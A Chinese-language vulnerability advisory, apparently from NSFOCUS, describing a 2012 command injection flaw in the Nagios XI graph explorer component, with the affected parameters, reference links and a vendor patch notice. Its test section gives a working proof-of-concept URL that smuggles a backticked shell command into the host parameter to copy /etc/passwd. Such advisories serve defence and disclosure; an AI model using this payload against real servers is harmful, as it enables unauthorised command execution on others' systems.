安全研究

安全漏洞
Nagios XI不明细节命令注入漏洞

发布日期:2012-07-02
更新日期:2012-07-03

受影响系统:
Nagios Nagios XI
描述:
BUGTRAQ  ID: 54263

Nagios是一款免费开放源代码的主机和服务监视软件,可使用在多种Linux和Unix操作系统下。

Nagios XI在过滤用户提供的输入时存在安全漏洞,攻击者可利用此漏洞在网络服务器进程中执行任意命令,导致控制应用和下层系统。

<*来源:Daniel Compton
  
  链接:http://www.metasploit.com/modules/exploit/unix/webapp/nagios_graph_explorer
        http://www.osvdb.org/83552
        http://packetstormsecurity.org/files/118497/Nagios-XI-Network-Monitor-2011R1.9-OS-Command-Injection.html
*>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

/nagiosxi/includes/components/graphexplorer/visApi.php (GET parameters:
host, service, opt, end, start)

URL:

http://192.168.1.121/nagiosxi/includes/components/graphexplorer/visApi.php?type=stack&host=localhost`cat%20/etc/passwd%20>%20/tmp/passwd.txt`&service=Swap_Usage&div=visContainer1566841654&opt=days

Result: creates a new file with /etc/passwd contents.

建议:
厂商补丁:

Nagios
------
目前厂商已经发布了升级补丁以修复这个安全问题,请到厂商的主页下载:

http://www.nagios.org/

浏览次数:2179
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障